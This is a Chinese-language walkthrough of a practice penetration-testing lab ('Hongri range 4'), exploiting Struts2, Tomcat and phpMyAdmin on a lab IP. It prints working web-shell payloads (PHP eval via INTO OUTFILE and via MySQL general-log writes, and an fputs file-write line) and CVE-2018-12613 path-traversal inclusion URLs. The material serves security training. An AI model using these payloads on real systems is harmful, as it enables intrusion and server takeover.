红日靶场4

外网信息收集与利用

struts2
Tomcat
    任意文件写入
phpmyadmin
    CVE-2018-12613 远程文件包含
    任意命令执行
    包含session文件

环境搭建
http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

外网的ip是192.168.3.129
信息收集
没有域名首先扫描端口看开放了哪些服务

22端口爆破无效
利用点一：
2001 有 Struts2尝试一下 Struts2全家桶
S2-045-1漏洞存在命令执行
可以尝试反弹shell

目标不出网不可取
写入shell 找不到返回路径

使用Struts2漏洞利用工具

利用点二：
Tomcat任意文件上传漏洞CVE-2017-12615
方法一

利用点三phpmyadmin

三种方法都试试
一、在网站根目录下
select @@basedir;
select ‘<?php eval($_POST[cmd]); ?>’ into outfile ‘/usr/local/mysql/1.php’;

网站的根目录 没有权限

二,利用mysql日志写文件
show variables like ‘%general%’; #查看日志状态—>即可爆出日志的保存状态和保存路径
SET GLOBAL general_log=’on’;
SET GLOBAL general_log_file=’根目录’; #即设置日志保存的根目录的地址—>即典型你要写马的位置
SELECT ‘<?php eval($_POST[“cmd”]);?>’; #执行语句—>即在日志文件中会直接生成

没有权限
三、CVE-2018-12613远程文件包含(对应版本:phpmyadmin 4.8.1)
payload:
http://192.168.3.129:2003/?target=tbl_zoom_select.php?/../../../../../../etc/hosts

想要包含session文件需要知道存放的session临时文件位置和session命名规则
首先查询select ‘<?php phpinfo();>’; 把php信息记录到session文件
获取session这里tmp为默认路径一般可以通过session.save_path知道其路径

http://192.168.3.129:2003/index.php?target=db_datadict.php%253f../../../../../../../../../tmp/sess_7f9afa3e635a97323bc3ff721e4741de

如何获取shell
通过远程下载或者php执行bash反弹因为这里环境不出网所以尝试使用fputs(fopen(“./1.php”,”a”),”<?php eval($_REQUEST[8]);?>”); 写入文件

接下篇——-